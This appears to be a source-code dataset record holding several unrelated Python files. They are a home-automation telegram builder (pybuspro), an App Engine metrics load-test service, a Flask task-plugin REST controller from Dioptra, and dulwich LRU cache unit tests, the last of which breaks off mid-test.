| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714957e1bb0b1384b108ed8e7921b1c771c5effe
| 4,815
|
py
|
Python
|
pybuspro/devices/control.py
|
eyesoft/pybuspro
|
9a178117be2db40ef1399cc60afdc18e251682bc
|
[
"MIT"
] | 2
|
2019-03-15T03:47:10.000Z
|
2019-10-30T15:34:09.000Z
|
pybuspro/devices/control.py
|
eyesoft/pybuspro
|
9a178117be2db40ef1399cc60afdc18e251682bc
|
[
"MIT"
] | null | null | null |
pybuspro/devices/control.py
|
eyesoft/pybuspro
|
9a178117be2db40ef1399cc60afdc18e251682bc
|
[
"MIT"
] | 4
|
2019-01-12T17:50:24.000Z
|
2020-01-12T16:56:24.000Z
|
from ..core.telegram import Telegram
from ..helpers.enums import OperateCode
class _Control:
def __init__(self, buspro):
self._buspro = buspro
self.subnet_id = None
self.device_id = None
@staticmethod
def build_telegram_from_control(control):
if control is None:
return None
if type(control) == _SingleChannelControl:
operate_code = OperateCode.SingleChannelControl
payload = [control.channel_number, control.channel_level, control.running_time_minutes,
control.running_time_seconds]
elif type(control) == _SceneControl:
operate_code = OperateCode.SceneControl
payload = [control.area_number, control.scene_number]
elif type(control) == _ReadStatusOfChannels:
operate_code = OperateCode.ReadStatusOfChannels
payload = []
elif type(control) == _GenericControl:
operate_code = control.operate_code
payload = control.payload
elif type(control) == _UniversalSwitch:
operate_code = OperateCode.UniversalSwitchControl
payload = [control.switch_number, control.switch_status.value]
elif type(control) == _ReadStatusOfUniversalSwitch:
operate_code = OperateCode.ReadStatusOfUniversalSwitch
payload = [control.switch_number]
elif type(control) == _ReadSensorStatus:
operate_code = OperateCode.ReadSensorStatus
payload = []
elif type(control) == _ReadSensorsInOneStatus:
operate_code = OperateCode.ReadSensorsInOneStatus
payload = []
elif type(control) == _ReadFloorHeatingStatus:
operate_code = OperateCode.ReadFloorHeatingStatus
payload = []
elif type(control) == _ReadDryContactStatus:
operate_code = OperateCode.ReadDryContactStatus
payload = [1, control.switch_number]
elif type(control) == _ControlFloorHeatingStatus:
operate_code = OperateCode.ControlFloorHeatingStatus
payload = [control.temperature_type, control.status, control.mode, control.normal_temperature,
control.day_temperature, control.night_temperature, control.away_temperature]
else:
return None
telegram = Telegram()
telegram.target_address = (control.subnet_id, control.device_id)
telegram.operate_code = operate_code
telegram.payload = payload
return telegram
@property
def telegram(self):
return self.build_telegram_from_control(self)
async def send(self):
telegram = self.telegram
# if telegram.target_address[1] == 100:
# print("==== {}".format(str(telegram)))
await self._buspro.network_interface.send_telegram(telegram)
class _GenericControl(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.payload = None
self.operate_code = None
class _SingleChannelControl(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.channel_number = None
self.channel_level = None
self.running_time_minutes = None
self.running_time_seconds = None
class _SceneControl(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.area_number = None
self.scene_number = None
class _ReadStatusOfChannels(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _UniversalSwitch(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.switch_number = None
self.switch_status = None
class _ReadStatusOfUniversalSwitch(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.switch_number = None
class _ReadSensorStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _ReadSensorsInOneStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _ReadFloorHeatingStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
# no more properties
class _ControlFloorHeatingStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.temperature_type = None
self.status = None
self.mode = None
self.normal_temperature = None
self.day_temperature = None
self.night_temperature = None
self.away_temperature = None
class _ReadDryContactStatus(_Control):
def __init__(self, buspro):
super().__init__(buspro)
self.switch_number = None
| 28.660714
| 106
| 0.655867
| 452
| 4,815
| 6.564159
| 0.165929
| 0.055612
| 0.056623
| 0.072801
| 0.229525
| 0.221436
| 0.198517
| 0.198517
| 0.198517
| 0.140546
| 0
| 0.001409
| 0.263136
| 4,815
| 167
| 107
| 28.832335
| 0.834837
| 0.032399
| 0
| 0.288288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126126
| false
| 0
| 0.018018
| 0.009009
| 0.288288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7149b8c5cf18fd7bdd1bfdc804b0918d755edaae
| 5,961
|
py
|
Python
|
appengine/chrome_infra_console_loadtest/main.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/chrome_infra_console_loadtest/main.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/chrome_infra_console_loadtest/main.py
|
eunchong/infra
|
ce3728559112bfb3e8b32137eada517aec6d22f9
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import endpoints
import random
import webapp2
from apiclient import discovery
from google.appengine.ext import ndb
from oauth2client.client import GoogleCredentials
from protorpc import messages
from protorpc import message_types
from protorpc import remote
from components import auth
CONFIG_DATASTORE_KEY = "CONFIG_DATASTORE_KEY"
API_NAME = 'consoleapp'
API_VERSION = 'v1'
DISCOVERY_URL = '%s/_ah/api/discovery/v1/apis/{api}/{apiVersion}/rest'
class FieldParamsModel(ndb.Model):
field_key = ndb.StringProperty()
values = ndb.StringProperty(repeated=True)
class MetricModel(ndb.Model):
name = ndb.StringProperty(default="")
minimum = ndb.FloatProperty(default=0)
maximum = ndb.FloatProperty(default=100)
class ParamsModel(ndb.Model):
time = ndb.FloatProperty(default=10)
freq = ndb.FloatProperty(default=1)
url = ndb.StringProperty()
params = ndb.LocalStructuredProperty(FieldParamsModel, repeated=True)
metrics = ndb.LocalStructuredProperty(MetricModel, repeated=True)
class Field(messages.Message):
key = messages.StringField(1)
value = messages.StringField(2)
class Point(messages.Message):
time = messages.FloatField(1)
value = messages.FloatField(2)
class FieldParams(messages.Message):
field_key = messages.StringField(1)
values = messages.StringField(2, repeated=True)
class Metric(messages.Message):
name = messages.StringField(1)
minimum = messages.FloatField(2)
maximum = messages.FloatField(3)
class Params(messages.Message):
time = messages.FloatField(1)
freq = messages.FloatField(2)
url = messages.StringField(3)
params = messages.MessageField(FieldParams, 4, repeated=True)
metrics = messages.MessageField(Metric, 5, repeated=True)
class TimeSeries(messages.Message):
points = messages.MessageField(Point, 1, repeated=True)
fields = messages.MessageField(Field, 2, repeated=True)
metric = messages.StringField(3)
class DataPacket(messages.Message):
timeseries = messages.MessageField(TimeSeries, 1, repeated=True)
@auth.endpoints_api(name='consoleapp', version='v1')
class LoadTestApi(remote.Service):
"""A testing endpoint that receives timeseries data."""
@auth.endpoints_method(DataPacket, message_types.VoidMessage,
name='timeseries.update')
@auth.require(lambda: auth.is_group_member('metric-generators'))
def timeseries_update(self, request):
logging.debug('Datapacket length is %d', len(request.timeseries))
return message_types.VoidMessage()
@auth.endpoints_api(name='ui', version='v1')
class UIApi(remote.Service):
"""API for the loadtest configuration UI."""
@auth.endpoints_method(message_types.VoidMessage, Params,
name='ui.get')
@auth.require(lambda: auth.is_group_member('metric-generators'))
def UI_get(self, _request):
data = ParamsModel.get_or_insert(CONFIG_DATASTORE_KEY)
params = [FieldParams(field_key=field.field_key, values=field.values)
for field in data.params]
metrics = [Metric(name=metric.name,
minimum=metric.minimum,
maximum=metric.maximum)
for metric in data.metrics]
return Params(time=data.time, freq=data.freq, url=data.url, params=params,
metrics=metrics)
@auth.endpoints_method(Params, message_types.VoidMessage,
name='ui.set')
@auth.require(lambda: auth.is_group_member('metric-generators'))
def UI_set(self, request):
logging.debug('Got %s', request)
data = ParamsModel.get_or_insert(CONFIG_DATASTORE_KEY)
data.time = request.time
data.freq = request.freq
data.url = request.url
data.params = [FieldParamsModel(field_key=field.field_key,
values=field.values)
for field in request.params]
data.metrics = [MetricModel(name=metric.name,
minimum=metric.minimum,
maximum=metric.maximum)
for metric in request.metrics]
data.put()
return message_types.VoidMessage()
def field_generator(dataparams, index, fields):
if index == len(dataparams):
return [fields]
else:
key = dataparams[index].field_key
return sum((field_generator(
dataparams, index+1, fields+[{'key': key, 'value': value}])
for value in dataparams[index].values), [])
class CronHandler(webapp2.RequestHandler):
def get(self):
data = ParamsModel.get_or_insert(CONFIG_DATASTORE_KEY)
metric_ranges = {}
for metric in data.metrics:
metric_ranges[metric.name] = (metric.minimum,metric.maximum)
datapacket = {'timeseries': []}
logging.debug('There are %d metrics', len(metric_ranges))
fieldlist = field_generator(data.params, 0, [])
for metric in metric_ranges:
for fields in fieldlist:
points = []
for x in xrange(0, int(data.time), int(data.freq)):
points.append({'time': x,
'value': random.uniform(*metric_ranges[metric])})
timeseries = {'points': points,
'fields': fields,
'metric': metric}
datapacket['timeseries'].append(timeseries)
logging.info('Send data to %s', data.url)
discovery_url = DISCOVERY_URL % data.url
credentials = GoogleCredentials.get_application_default()
service = discovery.build(API_NAME, API_VERSION,
discoveryServiceUrl=discovery_url,
credentials=credentials)
_response = service.timeseries().update(body=datapacket).execute()
backend_handlers = [
('/cron', CronHandler)
]
WEBAPP = webapp2.WSGIApplication(backend_handlers, debug=True)
APPLICATION = endpoints.api_server([LoadTestApi, UIApi])
| 33.301676
| 78
| 0.690824
| 687
| 5,961
| 5.896652
| 0.24163
| 0.02666
| 0.022217
| 0.015552
| 0.158973
| 0.150827
| 0.132066
| 0.132066
| 0.121205
| 0.096026
| 0
| 0.008384
| 0.199631
| 5,961
| 178
| 79
| 33.488764
| 0.840704
| 0.0411
| 0
| 0.105263
| 0
| 0
| 0.053305
| 0.009118
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037594
| false
| 0
| 0.082707
| 0
| 0.466165
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7149cd13d14ac2cce8176e2e198709907cc8c456
| 9,523
|
py
|
Python
|
src/mitre/securingai/restapi/task_plugin/controller.py
|
usnistgov/dioptra
|
08a08e96c27787915bafc75a483431333e2c70ca
|
[
"CC-BY-4.0"
] | 14
|
2021-06-17T15:16:12.000Z
|
2021-11-08T10:25:37.000Z
|
src/mitre/securingai/restapi/task_plugin/controller.py
|
usnistgov/dioptra
|
08a08e96c27787915bafc75a483431333e2c70ca
|
[
"CC-BY-4.0"
] | 7
|
2021-09-20T20:20:26.000Z
|
2022-03-30T13:17:43.000Z
|
src/mitre/securingai/restapi/task_plugin/controller.py
|
usnistgov/dioptra
|
08a08e96c27787915bafc75a483431333e2c70ca
|
[
"CC-BY-4.0"
] | 4
|
2021-06-29T16:52:42.000Z
|
2022-01-21T16:56:45.000Z
|
# This Software (Dioptra) is being made available as a public service by the
# National Institute of Standards and Technology (NIST), an Agency of the United
# States Department of Commerce. This software was developed in part by employees of
# NIST and in part by NIST contractors. Copyright in portions of this software that
# were developed by NIST contractors has been licensed or assigned to NIST. Pursuant
# to Title 17 United States Code Section 105, works of NIST employees are not
# subject to copyright protection in the United States. However, NIST may hold
# international copyright in software created by its employees and domestic
# copyright (or licensing rights) in portions of software that were assigned or
# licensed to NIST. To the extent that NIST holds copyright in this software, it is
# being made available under the Creative Commons Attribution 4.0 International
# license (CC BY 4.0). The disclaimers of the CC BY 4.0 license apply to all parts
# of the software developed or licensed by NIST.
#
# ACCESS THE FULL CC BY 4.0 LICENSE HERE:
# https://creativecommons.org/licenses/by/4.0/legalcode
"""The module defining the task plugin endpoints."""
import uuid
from typing import List, Optional
import structlog
from flask import current_app, jsonify
from flask.wrappers import Response
from flask_accepts import accepts, responds
from flask_restx import Namespace, Resource
from injector import inject
from structlog.stdlib import BoundLogger
from mitre.securingai.restapi.utils import as_api_parser
from .errors import TaskPluginDoesNotExistError, TaskPluginUploadError
from .model import TaskPlugin, TaskPluginUploadForm, TaskPluginUploadFormData
from .schema import TaskPluginSchema, TaskPluginUploadSchema
from .service import TaskPluginService
LOGGER: BoundLogger = structlog.stdlib.get_logger()
api: Namespace = Namespace(
"TaskPlugin",
description="Task plugin registry operations",
)
@api.route("/")
class TaskPluginResource(Resource):
"""Shows a list of all task plugins, and lets you POST to upload new ones."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema(many=True), api=api)
def get(self) -> List[TaskPlugin]:
"""Gets a list of all registered task plugins."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()), resource="taskPlugin", request_type="GET"
)
log.info("Request received")
return self._task_plugin_service.get_all(
bucket=current_app.config["AI_PLUGINS_BUCKET"], log=log
)
@api.expect(as_api_parser(api, TaskPluginUploadSchema))
@accepts(TaskPluginUploadSchema, api=api)
@responds(schema=TaskPluginSchema, api=api)
def post(self) -> TaskPlugin:
"""Registers a new task plugin uploaded via the task plugin upload form."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()), resource="taskPlugin", request_type="POST"
)
task_plugin_upload_form: TaskPluginUploadForm = TaskPluginUploadForm()
log.info("Request received")
if not task_plugin_upload_form.validate_on_submit():
log.error("Form validation failed")
raise TaskPluginUploadError
log.info("Form validation successful")
task_plugin_upload_form_data: TaskPluginUploadFormData = (
self._task_plugin_service.extract_data_from_form(
task_plugin_upload_form=task_plugin_upload_form, log=log
)
)
return self._task_plugin_service.create(
task_plugin_upload_form_data=task_plugin_upload_form_data,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
@api.route("/securingai_builtins")
class TaskPluginBuiltinsCollectionResource(Resource):
"""Shows a list of all builtin task plugins."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema(many=True), api=api)
def get(self) -> List[TaskPlugin]:
"""Gets a list of all available builtin task plugins."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginBuiltinCollection",
request_type="GET",
)
log.info("Request received")
return self._task_plugin_service.get_all_in_collection(
collection="securingai_builtins",
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
@api.route("/securingai_builtins/<string:taskPluginName>")
@api.param(
"taskPluginName",
"A unique string identifying a task plugin package within securingai_builtins "
"collection.",
)
class TaskPluginBuiltinCollectionNameResource(Resource):
"""Shows a single builtin task plugin package."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema, api=api)
def get(self, taskPluginName: str) -> TaskPlugin:
"""Gets a builtin task plugin by its unique name."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginBuiltinCollectionName",
request_type="GET",
)
log.info("Request received")
task_plugin: Optional[
TaskPlugin
] = self._task_plugin_service.get_by_name_in_collection(
collection="securingai_builtins",
task_plugin_name=taskPluginName,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
if task_plugin is None:
log.error(
"TaskPlugin not found",
task_plugin_name=taskPluginName,
collection="securingai_builtins",
)
raise TaskPluginDoesNotExistError
return task_plugin
@api.route("/securingai_custom")
class TaskPluginCustomCollectionResource(Resource):
"""Shows a list of all custom task plugins."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema(many=True), api=api)
def get(self) -> List[TaskPlugin]:
"""Gets a list of all registered custom task plugins."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginCustomCollection",
request_type="GET",
)
log.info("Request received")
return self._task_plugin_service.get_all_in_collection(
collection="securingai_custom",
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
@api.route("/securingai_custom/<string:taskPluginName>")
@api.param(
"taskPluginName",
"A unique string identifying a task plugin package within securingai_custom "
"collection.",
)
class TaskPluginCustomCollectionNameResource(Resource):
"""Shows a single custom task plugin package and lets you delete it."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema, api=api)
def get(self, taskPluginName: str) -> TaskPlugin:
"""Gets a custom task plugin by its unique name."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginCustomCollectionName",
request_type="GET",
)
log.info("Request received")
task_plugin: Optional[
TaskPlugin
] = self._task_plugin_service.get_by_name_in_collection(
collection="securingai_custom",
task_plugin_name=taskPluginName,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
if task_plugin is None:
log.error(
"TaskPlugin not found",
task_plugin_name=taskPluginName,
collection="securingai_custom",
)
raise TaskPluginDoesNotExistError
return task_plugin
def delete(self, taskPluginName: str) -> Response:
"""Deletes a custom task plugin by its unique name."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginCustomCollectionName",
task_plugin_name=taskPluginName,
request_type="DELETE",
)
log.info("Request received")
task_plugins: List[TaskPlugin] = self._task_plugin_service.delete(
collection="securingai_custom",
task_plugin_name=taskPluginName,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
name: List[str] = [x.task_plugin_name for x in task_plugins]
return jsonify( # type: ignore
dict(status="Success", collection="securingai_custom", taskPluginName=name)
)
| 37.789683
| 88
| 0.676888
| 1,065
| 9,523
| 5.844131
| 0.201878
| 0.086761
| 0.062821
| 0.043862
| 0.562661
| 0.503695
| 0.486343
| 0.486343
| 0.486343
| 0.486343
| 0
| 0.003009
| 0.23228
| 9,523
| 251
| 89
| 37.940239
| 0.848311
| 0.186076
| 0
| 0.57377
| 0
| 0
| 0.133655
| 0.029991
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0
| 0.076503
| 0
| 0.20765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714a5d7f1ebf03213e86c878b9d094ccb13ebf53
| 16,181
|
py
|
Python
|
dulwich/tests/test_lru_cache.py
|
mjmaenpaa/dulwich
|
d13a0375f4cc3099ff1c6edacda97f317c28f67a
|
[
"Apache-2.0"
] | null | null | null |
dulwich/tests/test_lru_cache.py
|
mjmaenpaa/dulwich
|
d13a0375f4cc3099ff1c6edacda97f317c28f67a
|
[
"Apache-2.0"
] | null | null | null |
dulwich/tests/test_lru_cache.py
|
mjmaenpaa/dulwich
|
d13a0375f4cc3099ff1c6edacda97f317c28f67a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2006, 2008 Canonical Ltd
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Tests for the lru_cache module."""
from dulwich import (
lru_cache,
)
from dulwich.tests import (
TestCase,
)
class TestLRUCache(TestCase):
"""Test that LRU cache properly keeps track of entries."""
def test_cache_size(self):
cache = lru_cache.LRUCache(max_cache=10)
self.assertEqual(10, cache.cache_size())
cache = lru_cache.LRUCache(max_cache=256)
self.assertEqual(256, cache.cache_size())
cache.resize(512)
self.assertEqual(512, cache.cache_size())
def test_missing(self):
cache = lru_cache.LRUCache(max_cache=10)
self.assertFalse('foo' in cache)
self.assertRaises(KeyError, cache.__getitem__, 'foo')
cache['foo'] = 'bar'
self.assertEqual('bar', cache['foo'])
self.assertTrue('foo' in cache)
self.assertFalse('bar' in cache)
def test_map_None(self):
# Make sure that we can properly map None as a key.
cache = lru_cache.LRUCache(max_cache=10)
self.assertFalse(None in cache)
cache[None] = 1
self.assertEqual(1, cache[None])
cache[None] = 2
self.assertEqual(2, cache[None])
# Test the various code paths of __getitem__, to make sure that we can
# handle when None is the key for the LRU and the MRU
cache[1] = 3
cache[None] = 1
cache[None]
cache[1]
cache[None]
self.assertEqual([None, 1], [n.key for n in cache._walk_lru()])
def test_add__null_key(self):
cache = lru_cache.LRUCache(max_cache=10)
self.assertRaises(ValueError, cache.add, lru_cache._null_key, 1)
def test_overflow(self):
"""Adding extra entries will pop out old ones."""
cache = lru_cache.LRUCache(max_cache=1, after_cleanup_count=1)
cache['foo'] = 'bar'
# With a max cache of 1, adding 'baz' should pop out 'foo'
cache['baz'] = 'biz'
self.assertFalse('foo' in cache)
self.assertTrue('baz' in cache)
self.assertEqual('biz', cache['baz'])
def test_by_usage(self):
"""Accessing entries bumps them up in priority."""
cache = lru_cache.LRUCache(max_cache=2)
cache['baz'] = 'biz'
cache['foo'] = 'bar'
self.assertEqual('biz', cache['baz'])
# This must kick out 'foo' because it was the last accessed
cache['nub'] = 'in'
self.assertFalse('foo' in cache)
def test_cleanup(self):
"""Test that we can use a cleanup function."""
cleanup_called = []
def cleanup_func(key, val):
cleanup_called.append((key, val))
cache = lru_cache.LRUCache(max_cache=2, after_cleanup_count=2)
cache.add('baz', '1', cleanup=cleanup_func)
cache.add('foo', '2', cleanup=cleanup_func)
cache.add('biz', '3', cleanup=cleanup_func)
self.assertEqual([('baz', '1')], cleanup_called)
# 'foo' is now most recent, so final cleanup will call it last
cache['foo']
cache.clear()
self.assertEqual([('baz', '1'), ('biz', '3'), ('foo', '2')],
cleanup_called)
def test_cleanup_on_replace(self):
"""Replacing an object should cleanup the old value."""
cleanup_called = []
def cleanup_func(key, val):
cleanup_called.append((key, val))
cache = lru_cache.LRUCache(max_cache=2)
cache.add(1, 10, cleanup=cleanup_func)
cache.add(2, 20, cleanup=cleanup_func)
cache.add(2, 25, cleanup=cleanup_func)
self.assertEqual([(2, 20)], cleanup_called)
self.assertEqual(25, cache[2])
# Even __setitem__ should make sure cleanup() is called
cache[2] = 26
self.assertEqual([(2, 20), (2, 25)], cleanup_called)
def test_len(self):
cache = lru_cache.LRUCache(max_cache=10, after_cleanup_count=10)
cache[1] = 10
cache[2] = 20
cache[3] = 30
cache[4] = 40
self.assertEqual(4, len(cache))
cache[5] = 50
cache[6] = 60
cache[7] = 70
cache[8] = 80
self.assertEqual(8, len(cache))
cache[1] = 15 # replacement
self.assertEqual(8, len(cache))
cache[9] = 90
cache[10] = 100
cache[11] = 110
# We hit the max
self.assertEqual(10, len(cache))
self.assertEqual([11, 10, 9, 1, 8, 7, 6, 5, 4, 3],
[n.key for n in cache._walk_lru()])
def test_cleanup_shrinks_to_after_clean_count(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=3)
cache.add(1, 10)
cache.add(2, 20)
cache.add(3, 25)
cache.add(4, 30)
cache.add(5, 35)
self.assertEqual(5, len(cache))
# This will bump us over the max, which causes us to shrink down to
# after_cleanup_cache size
cache.add(6, 40)
self.assertEqual(3, len(cache))
def test_after_cleanup_larger_than_max(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=10)
self.assertEqual(5, cache._after_cleanup_count)
def test_after_cleanup_none(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=None)
# By default _after_cleanup_size is 80% of the normal size
self.assertEqual(4, cache._after_cleanup_count)
def test_cleanup_2(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=2)
# Add these in order
cache.add(1, 10)
cache.add(2, 20)
cache.add(3, 25)
cache.add(4, 30)
cache.add(5, 35)
self.assertEqual(5, len(cache))
# Force a compaction
cache.cleanup()
self.assertEqual(2, len(cache))
def test_preserve_last_access_order(self):
cache = lru_cache.LRUCache(max_cache=5)
# Add these in order
cache.add(1, 10)
cache.add(2, 20)
cache.add(3, 25)
cache.add(4, 30)
cache.add(5, 35)
self.assertEqual([5, 4, 3, 2, 1], [n.key for n in cache._walk_lru()])
# Now access some randomly
cache[2]
cache[5]
cache[3]
cache[2]
self.assertEqual([2, 3, 5, 4, 1], [n.key for n in cache._walk_lru()])
def test_get(self):
cache = lru_cache.LRUCache(max_cache=5)
cache.add(1, 10)
cache.add(2, 20)
self.assertEqual(20, cache.get(2))
self.assertEqual(None, cache.get(3))
obj = object()
self.assertTrue(obj is cache.get(3, obj))
self.assertEqual([2, 1], [n.key for n in cache._walk_lru()])
self.assertEqual(10, cache.get(1))
self.assertEqual([1, 2], [n.key for n in cache._walk_lru()])
def test_keys(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=5)
cache[1] = 2
cache[2] = 3
cache[3] = 4
self.assertEqual([1, 2, 3], sorted(cache.keys()))
cache[4] = 5
cache[5] = 6
cache[6] = 7
self.assertEqual([2, 3, 4, 5, 6], sorted(cache.keys()))
def test_resize_smaller(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=4)
cache[1] = 2
cache[2] = 3
cache[3] = 4
cache[4] = 5
cache[5] = 6
self.assertEqual([1, 2, 3, 4, 5], sorted(cache.keys()))
cache[6] = 7
self.assertEqual([3, 4, 5, 6], sorted(cache.keys()))
# Now resize to something smaller, which triggers a cleanup
cache.resize(max_cache=3, after_cleanup_count=2)
self.assertEqual([5, 6], sorted(cache.keys()))
# Adding something will use the new size
cache[7] = 8
self.assertEqual([5, 6, 7], sorted(cache.keys()))
cache[8] = 9
self.assertEqual([7, 8], sorted(cache.keys()))
def test_resize_larger(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=4)
cache[1] = 2
cache[2] = 3
cache[3] = 4
cache[4] = 5
cache[5] = 6
self.assertEqual([1, 2, 3, 4, 5], sorted(cache.keys()))
cache[6] = 7
self.assertEqual([3, 4, 5, 6], sorted(cache.keys()))
cache.resize(max_cache=8, after_cleanup_count=6)
self.assertEqual([3, 4, 5, 6], sorted(cache.keys()))
cache[7] = 8
cache[8] = 9
cache[9] = 10
cache[10] = 11
self.assertEqual([3, 4, 5, 6, 7, 8, 9, 10], sorted(cache.keys()))
cache[11] = 12 # triggers cleanup back to new after_cleanup_count
self.assertEqual([6, 7, 8, 9, 10, 11], sorted(cache.keys()))
class TestLRUSizeCache(TestCase):
def test_basic_init(self):
cache = lru_cache.LRUSizeCache()
self.assertEqual(2048, cache._max_cache)
self.assertEqual(int(cache._max_size*0.8), cache._after_cleanup_size)
self.assertEqual(0, cache._value_size)
def test_add__null_key(self):
cache = lru_cache.LRUSizeCache()
self.assertRaises(ValueError, cache.add, lru_cache._null_key, 1)
def test_add_tracks_size(self):
cache = lru_cache.LRUSizeCache()
self.assertEqual(0, cache._value_size)
cache.add('my key', 'my value text')
self.assertEqual(13, cache._value_size)
def test_remove_tracks_size(self):
cache = lru_cache.LRUSizeCache()
self.assertEqual(0, cache._value_size)
cache.add('my key', 'my value text')
self.assertEqual(13, cache._value_size)
node = cache._cache['my key']
cache._remove_node(node)
self.assertEqual(0, cache._value_size)
def test_no_add_over_size(self):
"""Adding a large value may not be cached at all."""
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=5)
self.assertEqual(0, cache._value_size)
self.assertEqual({}, cache.items())
cache.add('test', 'key')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test': 'key'}, cache.items())
cache.add('test2', 'key that is too big')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test':'key'}, cache.items())
# If we would add a key, only to cleanup and remove all cached entries,
# then obviously that value should not be stored
cache.add('test3', 'bigkey')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test':'key'}, cache.items())
cache.add('test4', 'bikey')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test':'key'}, cache.items())
def test_no_add_over_size_cleanup(self):
"""If a large value is not cached, we will call cleanup right away."""
cleanup_calls = []
def cleanup(key, value):
cleanup_calls.append((key, value))
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=5)
self.assertEqual(0, cache._value_size)
self.assertEqual({}, cache.items())
cache.add('test', 'key that is too big', cleanup=cleanup)
# key was not added
self.assertEqual(0, cache._value_size)
self.assertEqual({}, cache.items())
# and cleanup was called
self.assertEqual([('test', 'key that is too big')], cleanup_calls)
def test_adding_clears_cache_based_on_size(self):
"""The cache is cleared in LRU order until small enough"""
cache = lru_cache.LRUSizeCache(max_size=20)
cache.add('key1', 'value') # 5 chars
cache.add('key2', 'value2') # 6 chars
cache.add('key3', 'value23') # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache['key2'] # reference key2 so it gets a newer reference time
